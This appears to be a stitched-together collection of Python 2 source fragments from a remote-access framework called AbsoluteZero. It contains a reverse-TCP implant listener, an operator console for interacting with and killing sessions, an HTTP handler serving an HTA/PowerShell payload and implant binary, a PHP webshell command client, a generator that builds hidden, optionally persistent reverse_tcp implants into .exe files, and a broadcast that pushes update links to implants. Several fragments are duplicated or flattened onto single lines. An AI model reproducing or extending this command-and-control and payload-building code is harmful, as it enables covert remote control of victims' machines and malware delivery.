def Parse(data_to_forward):
    """Turn one operator console line into the string that gets forwarded.

    A line starting with 'exec ' is read as '<group>/<module>::<command>' and
    resolved through modulehelper.GetPayload(). Any other line is returned
    base64-encoded. On a parse or lookup failure an error is printed and
    ebytes.EBYTES.ping_byte is returned instead of a payload.
    """
    try:
        if data_to_forward.startswith('exec '):
            # Only the second space-separated token is examined here.
            module_and_command = data_to_forward.split(' ')[1]
            module = module_and_command.split('::')[0]
            command = module_and_command.split('::')[1]
            # The part after '/' is the key checked against the module table.
            if not module.split('/')[1] in modulehelper.MODULES:
                print color.ReturnError('Module "%s" not found.' % module)
                return ebytes.EBYTES.ping_byte
            payload = modulehelper.GetPayload(module, command)
            # presumably break_byte is GetPayload's failure marker -- confirm
            # against ebytes.EBYTES.
            if payload != ebytes.EBYTES.break_byte:
                return payload
            else:
                return ebytes.EBYTES.ping_byte
        else:
            # base64 is an encoding only; it adds no confidentiality to the
            # forwarded line.
            return base64.b64encode(data_to_forward)
    except IndexError:
        # Raised by the [1] subscripts above when ' ', '::' or '/' is missing.
        print color.ReturnError(
            'Module execution error "%s" : wrong module name or parameter.' % data_to_forward)
        return ebytes.EBYTES.ping_byte
    except Exception, e:
        print color.ReturnError('Command "%s" unrecognized (%s).' % (data_to_forward, str(e)))
        return ebytes.EBYTES.ping_byte
def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction(int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError('Session Index "%s" killed => tcp://%s:%s\n' % ( str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError('Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError('No sessions open at index "%s"\n' % str(parameter)) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e))
def load():
    """Load settings from the XML file at fname into viewbag.

    Settings are assigned by position, not by element tag: the first element
    returned by findall() becomes CALLBACK_IP, the second BUFFER_SIZE, and so
    on. If the eighth value is 'True' the TCP handler is started in a daemon
    thread. Nothing happens when fname does not exist; any exception is
    printed and swallowed.
    """
    try:
        if os.path.isfile(fname):
            print color.ReturnInfo('Loading configuration file...')
            counter = 0
            document = ElementTree.parse(fname)
            # NOTE(review): values are trusted as-is; a reordered or hand-edited
            # file silently assigns values to the wrong setting.
            for setting in document.findall('system/'):
                if counter == 0:
                    viewbag.CALLBACK_IP = setting.attrib['name']
                elif counter == 1:
                    viewbag.BUFFER_SIZE = int(setting.attrib['name'])
                elif counter == 2:
                    TCPhandler.Helper.InitializePorts(setting.attrib['name'])
                elif counter == 3:
                    viewbag.MAX_CONN = int(setting.attrib['name'])
                elif counter == 4:
                    # Booleans are stored as the strings 'True' / 'False'.
                    if setting.attrib['name'] == 'True':
                        viewbag.MESSAGE_LENGTH_SHOW = True
                    else:
                        viewbag.MESSAGE_LENGTH_SHOW = False
                elif counter == 5:
                    viewbag.ENVIRONMENT_FOLDER = setting.attrib['name']
                elif counter == 6:
                    if setting.attrib['name'] == 'True':
                        viewbag.NOTIFY_CONNECTION = True
                    else:
                        viewbag.NOTIFY_CONNECTION = False
                elif counter == 7:
                    if setting.attrib['name'] == 'True':
                        viewbag.AUTOSTART_TCP = True
                        # Loading the file is enough to open the listeners
                        # when this flag is set.
                        if not viewbag.SERVER_STATUS:
                            if not viewbag.PORT_LIST:
                                print color.ReturnError(
                                    'Error: port list is empty.')
                            elif not viewbag.CALLBACK_IP:
                                print color.ReturnError(
                                    'Error: callback ip is not defined.')
                            else:
                                print color.ReturnInfo(
                                    'Started Reverse TCP Handler on %s:%s' %
                                    (viewbag.CALLBACK_IP,
                                     TCPhandler.Helper.GetPrintablePorts()))
                                thread = threading.Thread(
                                    target=TCPhandler.Helper.StartTcpHandler)
                                thread.daemon = True
                                thread.start()
                                viewbag.SERVER_STATUS = True
                                time.sleep(1)
                        else:
                            print color.ReturnError(
                                'Server is already online.')
                    else:
                        viewbag.AUTOSTART_TCP = False
                counter += 1
            print color.ReturnSuccess('Configuration file loaded.\n')
    except Exception, e:
        print color.ReturnError('Error parsing the configuration: %s' % str(e))
def do_GET(self):
    """Answer GET requests for the two paths this handler serves.

    '/hta' returns the text from mshta().getPayload(). '/<implant_name>'
    returns the bytes of the file at mshta().implant_path. Any other path
    falls through without a response being written. Exceptions are printed
    and swallowed.
    """
    try:
        if self.path == '/hta':
            if viewbag.NOTIFY_CONNECTION:
                print color.ReturnGreenNotify(
                    '[+] New agent request -> HTA payload (%s)' %
                    self.client_address[0])
            # No Content-Type or Content-Length header is added between
            # send_response() and end_headers().
            self.send_response(200)
            message = ''
            message += mshta().getPayload()
            self.end_headers()
            self.wfile.write(message)
            if viewbag.NOTIFY_CONNECTION:
                # getPayload() is called a second time just to report its size.
                print color.ReturnGreenNotify(
                    '[*] Powershell PAYLOAD sent (%s Bytes) -> %s' %
                    (mshta().utf8len(
                        mshta().getPayload()), self.client_address[0]))
            return
        elif self.path == '/' + mshta().implant_name:
            self.send_response(200)
            self.end_headers()
            # The whole file is read into memory and written in one call.
            with open(mshta().implant_path, 'rb') as file_:
                self.wfile.write(file_.read())
            if viewbag.NOTIFY_CONNECTION:
                print color.ReturnGreenNotify(
                    "[+] Agent has downloaded the payload -> %s" %
                    mshta().implant_name)
    except Exception, e:
        print color.ReturnError("mshta.do_GET -> " + str(e))
def KillImplant(index):
    """Send ebytes.EBYTES.exit_byte to the session stored at index.

    Only socket.error is handled. An out-of-range index raises IndexError
    to the caller.
    """
    try:
        Helper.send_msg(viewbag.all_connections[index], ebytes.EBYTES.exit_byte)
    except socket.error as e:
        # NOTE(review): the message is built but never printed, and its '%s'
        # placeholder is never filled in.
        color.ReturnError("Can't kill session '%s' -> " + str(e))
        # NOTE(review): the source's indentation was lost; this call is assumed
        # to belong to the error path -- confirm against the original file.
        Helper.RemoveSession(index)
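def save():
    """Write the current viewbag settings to the XML file at fname.

    The document is '<viewbag><system>...</system></viewbag>' with one child
    element per setting, each carrying its value in a 'name' attribute. The
    child order matters because load() reads the settings back by position.
    Any exception is printed and swallowed.
    """
    print '\n' + color.ReturnInfo('Saving current system configuration...')
    try:
        viewbag_node = Element('viewbag')
        system_node = SubElement(viewbag_node, 'system')
        port_list = TCPhandler.Helper.GetPrintablePorts()
        SubElement(system_node, 'CALLBACK_IP', name=viewbag.CALLBACK_IP)
        SubElement(system_node, 'BUFFER_SIZE', name=str(viewbag.BUFFER_SIZE))
        SubElement(system_node, 'PORT_LIST', name=port_list)
        SubElement(system_node, 'MAX_CONN', name=str(viewbag.MAX_CONN))
        SubElement(system_node, 'MESSAGE_LENGTH_SHOW',
                   name=str(viewbag.MESSAGE_LENGTH_SHOW))
        SubElement(system_node, 'ENVIRONMENT_FOLDER',
                   name=viewbag.ENVIRONMENT_FOLDER)
        SubElement(system_node, 'NOTIFY_CONNECTION',
                   name=str(viewbag.NOTIFY_CONNECTION))
        SubElement(system_node, 'AUTOSTART_TCP',
                   name=str(viewbag.AUTOSTART_TCP))
        # Serialise before opening the file: a failure in tostring() can then
        # no longer leave a truncated configuration file behind.
        document = '<?xml version="1.0"?>' + ElementTree.tostring(viewbag_node)
        # The context manager closes the handle even when write() raises; the
        # earlier open()/close() pair leaked it on that path.
        with open(fname, 'w') as output_file:
            print color.ReturnInfo('Writing to "configuration.xml"...')
            output_file.write(document)
        print color.ReturnSuccess('Saved to -> "%s"' % fname)
    except Exception, e:
        print color.ReturnError('Error saving configuration: %s' % str(e))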
def StartTcpHandler():
    """Open one TCP listener per configured port and register each peer.

    Session state lives in parallel viewbag.all_* lists that share an index.
    The first message from a peer is split on viewbag.SPL into name, OS and
    architecture. The accept loop never returns; any exception ends it,
    because the single try block wraps the whole function.
    """
    try:
        for port in viewbag.PORT_LIST:
            ds = (viewbag.CALLBACK_IP, port)
            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            server.bind(ds)
            server.listen(viewbag.MAX_CONN)
            viewbag.SERVERS.append(server)
        while True:
            # Only the first ready listener is served on each pass.
            readable, _, _ = select.select(viewbag.SERVERS, [], [])
            ready_server = readable[0]
            connection, address = ready_server.accept()
            connection.setblocking(1)
            implanthash = tools.GetUniqueHashFromString(address[0])
            implantnow = datetime.now()
            # NOTE(review): these lists grow before the hello message is
            # parsed. If the split below does not yield exactly three fields,
            # the all_* lists are left with different lengths and the loop ends.
            viewbag.all_addresses.append(address)
            viewbag.all_connections.append(connection)
            viewbag.all_hashes.append(implanthash)
            viewbag.all_times.append(implantnow)
            viewbag.all_rport.append(ready_server.getsockname()[1])
            # Nothing in this function authenticates the peer; the three
            # fields are whatever the remote end sent.
            name, os_, arch = Helper.recv_msg(connection).split(viewbag.SPL)
            viewbag.all_names.append(name)
            viewbag.all_os.append(os_)
            viewbag.all_arch.append(arch)
            # NOTE(review): `name` comes from the network and is joined into a
            # filesystem path with no sanitising of separators or '..'.
            implant_folder = viewbag.ENVIRONMENT_FOLDER + '\\' + address[0] + "_" + name + "\\"
            tools.mkdir(implant_folder)
            viewbag.all_folders.append(implant_folder)
    except Exception as e:
        print color.ReturnError('StartTcpHandler -> ' + str(e))
def remove():
    """Delete the configuration file at fname and report the outcome.

    Any exception, including a missing file, is printed and swallowed.
    """
    try:
        starting = color.ReturnInfo('Removing current configuration...')
        print starting
        os.remove(fname)
        finished = color.ReturnSuccess('Configuration removed successfully.')
        print finished
    except Exception as problem:
        failure = 'Error removing configuration: %s' % str(problem)
        print color.ReturnError(failure)
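def InitializePorts(ports):
    """Replace viewbag.PORT_LIST with the ports in a comma-separated string.

    Args:
        ports: text such as '80,443'; every entry must be an integer in the
            range 0-65535.

    Returns:
        The confirmation line 'CALLBACK_PORTS => <ports>' on success. On a
        bad entry the error is printed, None is returned implicitly and the
        existing port list is left untouched.
    """
    try:
        parsed = []
        for port in ports.split(','):
            number = int(port)
            # Reject values that could never be bound, so the mistake surfaces
            # here instead of later inside the listener thread.
            if not 0 <= number <= 65535:
                raise ValueError('port out of range: %s' % port)
            parsed.append(number)
        # Assign only after every entry has parsed. Previously the list was
        # cleared first, so one bad entry left it half-populated.
        viewbag.PORT_LIST = parsed
        return 'CALLBACK_PORTS => %s' % ports
    except Exception, e:
        print color.ReturnError('InitializePorts -> ' + str(e))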
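def writeFile(fname, body):
    """Write body to fname in text mode, replacing any existing file.

    Returns:
        True when the write succeeded. On any error the message is printed
        and False is returned.
    """
    try:
        # The context manager closes the handle even when write() raises; the
        # earlier open()/close() pair leaked it on that path.
        with open(fname, "w") as f:
            f.write(body)
        return True
    except Exception as e:
        print(color.ReturnError("PayloadGen.WriteFile -> " + str(e)))
        return False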
def GetPayload(module_name, command):
    """Run a registered module and return its output wrapped for forwarding.

    module_name is given as '<group>/<name>'; only the part after '/' is
    used. The result is base64 of 'exec+++++' followed by whatever the
    module's run(command) returned. '\\x10' is returned when the module is
    not registered or anything raises.
    """
    try:
        module_name = module_name.split('/')[1]
        # MODULES acts as the allow-list; the module object itself is taken
        # from sys.modules, so it must already have been imported.
        if module_name in MODULES:
            payload = sys.modules["payloads.modules." + module_name].run(command)
            return base64.b64encode('exec' + '+' * 5 + payload)
        else:
            # presumably the same value as ebytes.EBYTES.break_byte, which
            # callers compare against -- confirm.
            return '\x10'
    except Exception as e:
        print color.ReturnError('GetPayload -> ' + str(e))
        return '\x10'
def Connect():
    """Run an interactive loop against the configured PHP page over HTTP.

    Reads webshell_ip, webshell_port, webshell_page_name and
    webshell_password from names defined outside this function. A first
    request carries only the password; the reply is accepted when it starts
    with '$.'. Each console line is then sent as the 'command' query
    parameter until the operator types 'exit'. Exceptions are printed and
    swallowed.
    """
    try:
        # NOTE(review): the password travels in the query string of every
        # request, over plain http://. It is therefore visible to anything on
        # the path and is recorded in web-server and proxy access logs. The
        # '?password=...&command=...' shape is a usable log-hunting pattern.
        data = "?password=%s" % webshell_password
        command = data + "&command"
        checker = False
        url = 'http://' + webshell_ip + ':' + str(
            webshell_port) + '/' + webshell_page_name
        print '\n' + color.ReturnInfo(
            'Establishing the connection with the webshell -> %s' % url)
        rec = urllib2.Request(url + data)
        response = urllib2.urlopen(rec)
        check = response.read()
        print color.ReturnInfo('Webshell is online')
        i = len(check)  # unused apart from the commented-out debug print below
        f = check.find("$.")
        # print f
        # print i  # enable to inspect the response length
        if f == 0:
            print color.ReturnSuccess(
                'Connection succeeded -> %s' % url) + '\n'
            checker = True
            while checker:
                sys.stdout.write(
                    color.ReturnImplantConsole('absoluteZero-PHP'))
                cmd = raw_input('')
                if cmd == "exit":
                    print color.ReturnError('Php session has been closed.')
                    break
                # Only spaces are percent-encoded; all other characters are
                # sent as typed.
                newcmd = cmd.replace(" ", "%20")
                rec2 = urllib2.Request(url + command + "=%s" % newcmd)
                # urlencode=urllib2.unquote(rec2)
                response = urllib2.urlopen(rec2)
                check2 = response.read()
                print("--> " + check2)
        else:
            print color.ReturnError('Invalid password.')
            return
    except Exception, e:
        print color.ReturnError('Error connecting to the webshell -> %s' %
                                str(e))
def StartTcpHandler():
    """Open the TCP listeners and register each peer, sending it the AES key.

    crypto_aes.initKey() is called once, then one listener is bound per
    configured port. Session state lives in parallel viewbag.all_* lists
    that share an index. The accept loop never returns; any exception ends
    it, because the single try block wraps the whole function.
    """
    try:
        # Initialize cryptography
        print color.ReturnInfo(
            'Setting up AES keys for encrypted connection..')
        crypto_aes.initKey()
        print color.ReturnSuccess('Ready for the encrypted communication.')
        # Load ports and start socket server
        for port in viewbag.PORT_LIST:
            ds = (viewbag.CALLBACK_IP, port)
            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            server.bind(ds)
            server.listen(viewbag.MAX_CONN)
            viewbag.SERVERS.append(server)
        while True:
            # Only the first ready listener is served on each pass.
            readable, _, _ = select.select(viewbag.SERVERS, [], [])
            ready_server = readable[0]
            connection, address = ready_server.accept()
            connection.setblocking(1)
            implanthash = tools.GetUniqueHashFromString(address[0])
            implantnow = datetime.now()
            viewbag.all_addresses.append(address)
            viewbag.all_connections.append(connection)
            viewbag.all_hashes.append(implanthash)
            viewbag.all_times.append(implantnow)
            viewbag.all_rport.append(ready_server.getsockname()[1])
            # Setup encrypted connection with the new implant
            # NOTE(review): the key is written to the socket with base64
            # encoding only. Anyone who captures this first server-to-client
            # message can recover it, so the later AES layer hides traffic
            # from casual inspection but not from a network observer.
            # initKey() ran once before this loop, so every peer accepted
            # here receives the same value.
            connection.send(base64.b64encode(crypto_aes.uniqueKey))
            # Nothing in this function authenticates the peer; the three
            # fields are whatever the remote end sent.
            name, os_, arch = Helper.recv_msg(connection).split(
                viewbag.SPL)
            viewbag.all_names.append(name)
            viewbag.all_os.append(os_)
            viewbag.all_arch.append(arch)
            if viewbag.NOTIFY_CONNECTION:
                print '\n' + color.ReturnSuccess(
                    'New implant connected %s/%s (%s)' %
                    (address[0], name, os_))
            # NOTE(review): `name` comes from the network and is joined into a
            # filesystem path with no sanitising of separators or '..'.
            implant_folder = viewbag.ENVIRONMENT_FOLDER + '\\' + address[
                0] + "_" + name + "\\"
            tools.mkdir(implant_folder)
            viewbag.all_folders.append(implant_folder)
    except Exception as e:
        print color.ReturnError('StartTcpHandler -> ' + str(e))
def Generate(string_):
    """Produce a configured copy of the reverse_tcp stub from a console line.

    string_ must split into exactly eight space-separated fields, which are
    used by position. The stub source is copied to a temporary .py file,
    five literal assignments in it are replaced by text substitution, and the
    result is passed through PayloadGenerator.AES_payload(). The file is
    then copied to the requested output path, or on Windows handed to
    PyInstaller when that path ends in '.exe'. Errors are printed, never
    raised.
    """
    if len(string_.split(' ')) != 8:
        print color.ReturnError("Error: Arguments don't match path.")
        print(PayloadGenerator.doPrintHelp())
    else:
        try:
            # NOTE(review): despite its name, `sanitized` is only the split
            # input. No field is validated or escaped before it is pasted into
            # Python source text or used as a filesystem path below.
            sanitized = string_.split(' ')
            file_extension = os.path.splitext(sanitized[5])[1]
            if file_extension == ".exe":
                if os.name == "nt":
                    # Loop until PyInstaller exists at the hard-coded path or
                    # the operator declines to install it.
                    while True:
                        if os.path.exists(r"C:\Python27\Scripts\pyinstaller.exe"):
                            print color.ReturnSuccess(
                                "Pyinstaller validated => C:\Python27\Scripts\pyinstaller.exe")
                            break
                        else:
                            print color.ReturnError("Pyinstaller not found!")
                            print color.ReturnError(
                                "Can't proceed with .exe standalone builder without Pyinstaller.\n")
                            if tools.Confirm('Do you want to install "Pyinstaller" now via "pip" command?'):
                                # NOTE(review): runs through the shell and
                                # installs an unpinned, unverified package.
                                os.system("c:\Python27\Scripts\pip.exe install pyinstaller")
                            else:
                                return None
                else:
                    print color.ReturnError("Can't build .exe binary from Linux platform.")
                    return
            print color.ReturnInfo("Input validated, generating payload ...")
            # The working copy gets a numeric name from getRandomNumber().
            if os.name == "nt":
                stubname = PayloadGenerator.getTempPath() + str(
                    PayloadGenerator.getRandomNumber(80000, 90000)) + ".py"
            else:
                stubname = os.path.dirname(os.path.abspath(__file__)) + "/" + str(
                    PayloadGenerator.getRandomNumber(80000, 90000)) + ".py"
            stubpath = os.path.abspath(
                os.path.join(os.path.abspath(os.path.join(PayloadGenerator.getStartupPath(__file__), os.pardir)),
                             os.pardir)) + "/payloads/reverse_tcp.py"
            try:
                shutil.copyfile(stubpath, stubname)
            except Exception, e:
                # A failed copy is only printed; execution continues and
                # readFile() below then works on whatever is at stubname.
                print str(e)
            payload_body = PayloadGenerator.readFile(stubname)
            # Plain text substitution on the stub's default assignments; a
            # default that does not match exactly is silently left unchanged.
            payload_body = payload_body.replace("self.host = '127.0.0.1'", "self.host = '%s'" % str(sanitized[1]))
            payload_body = payload_body.replace("self.port = 9876", "self.port = %s" % str(sanitized[2]))
            payload_body = payload_body.replace("self.debug = True", "self.debug = %s" % str(sanitized[3]))
            payload_body = payload_body.replace("self.implantName = '0x' + 'EP01'",
                                                "self.implantName = '0x' + '%s'" % str(sanitized[4]))
            payload_body = payload_body.replace("self.autoPersistence = False", "self.autoPersistence = %s" %
                                                str(sanitized[7]))
            payload_body = PayloadGenerator.AES_payload(payload_body)
            PayloadGenerator.writeFile(stubname, payload_body)
            if file_extension == ".exe":
                if os.name == "nt":
                    outputfile = sanitized[5]
                    if not ".exe" in outputfile:
                        outputfile += ".exe"
                    console_debug = ''
                    hidden_imports = '--hidden-import PIL.ImageGrab '
                    hidden_imports += '--hidden-import psutil '
                    hidden_imports += '--hidden-import json '
                    if sanitized[3] == "False":
                        console_debug = "--noconsole --windowed"
                    else:
                        console_debug = None
                    # The command line is one formatted string, not an
                    # argument list.
                    if console_debug is None:
                        query = "c:\Python27\Scripts\pyinstaller.exe %s --onefile %s" % (hidden_imports, stubname)
                    else:
                        query = "c:\Python27\Scripts\pyinstaller.exe %s --onefile %s %s" % (
                            hidden_imports, console_debug, stubname)
                    subprocess.call(query)
                    time.sleep(5)
                    # Three hard-coded locations are probed for the build
                    # output.
                    if os.path.exists(
                            "C:\Python27\Scripts\dist\%s.exe" % PayloadGenerator.getFileNameWithoutExtension(
                                stubname)):
                        shutil.copyfile(
                            "C:\Python27\Scripts\dist\%s.exe" % PayloadGenerator.getFileNameWithoutExtension(
                                stubname), outputfile)
                    elif os.path.exists(
                            "C:\Python27\dist\%s.exe" % PayloadGenerator.getFileNameWithoutExtension(stubname)):
                        shutil.copyfile(
                            "C:\Python27\dist\%s.exe" % PayloadGenerator.getFileNameWithoutExtension(stubname),
                            outputfile)
                    # NOTE(review): in this non-raw literal '\b' is the
                    # backspace escape, so the string is not the path it
                    # appears to be.
                    elif os.path.exists(
                            "C:\Python27\build\%s\%s.exe" % (PayloadGenerator.getFileNameWithoutExtension(stubname),
                                                             PayloadGenerator.getFileNameWithoutExtension(
                                                                 stubname))):
                        shutil.copyfile(
                            "C:\Python27\build\%s\%s.exe" % (PayloadGenerator.getFileNameWithoutExtension(stubname),
                                                             PayloadGenerator.getFileNameWithoutExtension(
                                                                 stubname)), outputfile)
                    else:
                        print color.ReturnError(
                            "Can't move file to location, maybe pyinstaller didn't move it yet.")
                    try:
                        os.remove(stubname)
                    except Exception as e:
                        print color.ReturnError("Error removing stub file: %s" % str(e))
                    print color.ReturnInfo("Final output size => %s" % PayloadGenerator.getFileSize(outputfile))
                    print color.ReturnSuccess("DONE => %s" % outputfile)
                else:
                    print color.ReturnError("Can't build .exe binary from Linux platform.")
                    return
            else:
                shutil.copyfile(stubname, sanitized[5])
                try:
                    os.remove(stubname)
                except Exception as e:
                    print color.ReturnError("Error: %s" % str(e))
                time.sleep(1)
                if sanitized[6] == 'True':
                    print '\nPayload: \n' + payload_body + '\n'
                print color.ReturnSuccess("Final payload size => %s" % PayloadGenerator.getFileSize(sanitized[5]))
                print color.ReturnSuccess(("DONE => %s\n" % sanitized[5]))
        except Exception as e:
            print color.ReturnError("Error: %s" % str(e))
except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command.startswith('run '): try: _, argument = command.split(' ') if argument == "tcp": if not viewbag.SERVER_STATUS: if not viewbag.PORT_LIST: print color.ReturnError('Error: port list is empty.') elif not viewbag.CALLBACK_IP: print color.ReturnError('Error: callback ip is not defined.') else: print '' print color.ReturnInfo('Started Reverse TCP Handler on %s:%s\n' % ( viewbag.CALLBACK_IP, TCPhandler.Helper.GetPrintablePorts())) thread = threading.Thread(target=TCPhandler.Helper.StartTcpHandler) thread.daemon = True thread.start() viewbag.SERVER_STATUS = True else: print color.ReturnError('Server is already online.') else: print color.ReturnError('Unrecognized argument "%s"' % argument)
def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command != '': log.doLog('[COMMAND] ' + str(command)) if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction( int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError( 'Session Index "%s" killed => tcp://%s:%s\n' % (str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError( 'Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError( 'No sessions open at index "%s"\n' % command.split(' ')[2]) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command == "update": try: print 'Choose the vector method to download the new version:\n\n1) Direct Link\n2) Upload from local drive\n' choose = int(raw_input('')) if choose == 1: print color.ReturnQuestion( 'Insert the direct link (be sure that the file is public accessibly): ' ) link = raw_input('') if link != '': TCPhandler.Helper.Broadcast('\x22' + viewbag.SPL + link) else: print color.ReturnError( 'Link cannot be empty.') elif choose == 2: pass else: print color.ReturnError( 'Invalid choose selection.') except Exception, e: print color.ReturnError(str(e))
class CLI: def __init__(self): pass @staticmethod def InitializeEnvironemnt(): if os.name == 'nt': bfolder = os.getenv( 'APPDATA') + '\Microsoft\Templates\AbsoluteZero' else: from os.path import expanduser bfolder = expanduser("~") + '/AbsoluteZero' tools.mkdir(bfolder) viewbag.ENVIRONMENT_FOLDER = bfolder @staticmethod def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command != '': log.doLog('[COMMAND] ' + str(command)) if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction( int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError( 'Session Index "%s" killed => tcp://%s:%s\n' % (str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError( 'Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError( 'No sessions open at index "%s"\n' % command.split(' ')[2]) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command == "update": try: print 'Choose the vector method to download the new version:\n\n1) Direct Link\n2) Upload from local drive\n' choose = int(raw_input('')) if choose == 1: print color.ReturnQuestion( 'Insert the direct link (be sure that the file is public accessibly): ' ) link = raw_input('') if link != '': TCPhandler.Helper.Broadcast('\x22' + viewbag.SPL + link) else: print color.ReturnError( 'Link cannot be empty.') elif choose == 2: pass else: print color.ReturnError( 'Invalid 
choose selection.') except Exception, e: print color.ReturnError(str(e)) elif command.startswith('run '): try: _, argument = command.split(' ') if argument == "tcp": if not viewbag.SERVER_STATUS: if not viewbag.PORT_LIST: print color.ReturnError( 'Error: port list is empty.') elif not viewbag.CALLBACK_IP: print color.ReturnError( 'Error: callback ip is not defined.' ) else: print '' print color.ReturnInfo( 'Started Reverse TCP Handler on %s:%s\n' % (viewbag.CALLBACK_IP, TCPhandler.Helper. GetPrintablePorts())) thread = threading.Thread( target=TCPhandler.Helper. StartTcpHandler) thread.daemon = True thread.start() viewbag.SERVER_STATUS = True else: print color.ReturnError( 'Server is already online.') elif argument == "php": if not PHPhandler.webshell_ip: print color.ReturnError( 'Error -> PHP handler webshell_ip must not be empty.' ) continue elif not PHPhandler.webshell_port: print color.ReturnError( 'Error -> PHP handler webshell_port must not be empty.' ) continue elif not PHPhandler.webshell_password: print color.ReturnError( 'Error -> PHP handler webshell_password must not be empty.' ) continue elif not PHPhandler.webshell_page_name: print color.ReturnError( 'Error -> PHP handler webshell_page_name must not be empty.' ) continue else: PHPhandler.Connect() continue else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + str(e))
def InitializeIp(ip):
    """Store ip as viewbag.CALLBACK_IP and return a confirmation line.

    The value is stored exactly as given; it is not checked to be a valid
    address. If an exception occurs it is printed and None is returned
    implicitly.
    """
    try:
        viewbag.CALLBACK_IP = ip
        confirmation = 'CALLBACK_IP => %s' % ip
        return confirmation
    except Exception as problem:
        report = 'InitializeIp -> ' + str(problem)
        print color.ReturnError(report)
print "AUTOSTART_TCP => " + parameter else: print color.ReturnError( 'Unrecognized argument "%s"' % argument) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command.startswith('php '): try: if command.split(' ')[1] == "show": if command.split(' ')[2] == "options": print PHPhandler.ShowOptions() else: _, field, value = command.split(' ') PHPhandler.SetField(field, value) except Exception, e: print color.ReturnError('Php set error -> %s.' % str(e)) elif command.startswith('config '): try: argument = command.split(' ')[1] if argument == "save": xmllib.save() elif argument == "remove": xmllib.remove() else: print color.ReturnError( 'Unrecognized argument "%s".' % argument) except Exception, e: print color.ReturnError( 'Configuration error -> %s.' % str(e)) elif command == "modules":
class CLI: def __init__(self): pass @staticmethod def InitializeEnvironemnt(): if os.name == 'nt': bfolder = os.getenv( 'APPDATA') + '\Microsoft\Templates\AbsoluteZero' else: from os.path import expanduser bfolder = expanduser("~") + '/AbsoluteZero' tools.mkdir(bfolder) viewbag.ENVIRONMENT_FOLDER = bfolder @staticmethod def console(): CLI.InitializeEnvironemnt() while True: try: sys.stdout.write(color.ReturnConsole('ab0')) command = raw_input('') if command != '': if command.startswith('sessions '): try: if command.split(' ')[1] == "-v": print TCPhandler.Helper.ListSessions() continue _, argument, parameter = command.split(' ') if argument == "-i": TCPhandler.Helper.ImplantInteraction( int(parameter)) elif argument == "-k": TCPhandler.Helper.KillImplant(int(parameter)) print "\n" + color.ReturnError( 'Session Index "%s" killed => tcp://%s:%s\n' % (str(parameter), viewbag.all_addresses[int(parameter)][0], viewbag.all_addresses[int(parameter)][1])) TCPhandler.Helper.RemoveSession(int(parameter)) else: print color.ReturnError( 'Invalid argument "%s"' % argument) pass except IndexError: print color.ReturnError( 'No sessions open at index "%s"\n' % str(parameter)) except Exception, e: print color.ReturnError('Console -> ' + str(e)) elif command == "show options": print options.ShowOptions() elif command.startswith('payloadgen'): try: payloadgen.PayloadGenerator.Generate(command) except Exception, e: print color.ReturnError(str(e)) elif command.startswith('run '): try: _, argument = command.split(' ') if argument == "tcp": if not viewbag.SERVER_STATUS: if not viewbag.PORT_LIST: print color.ReturnError( 'Error: port list is empty.') elif not viewbag.CALLBACK_IP: print color.ReturnError( 'Error: callback ip is not defined.' ) else: print '' print color.ReturnInfo( 'Started Reverse TCP Handler on %s:%s\n' % (viewbag.CALLBACK_IP, TCPhandler.Helper. GetPrintablePorts())) thread = threading.Thread( target=TCPhandler.Helper. 
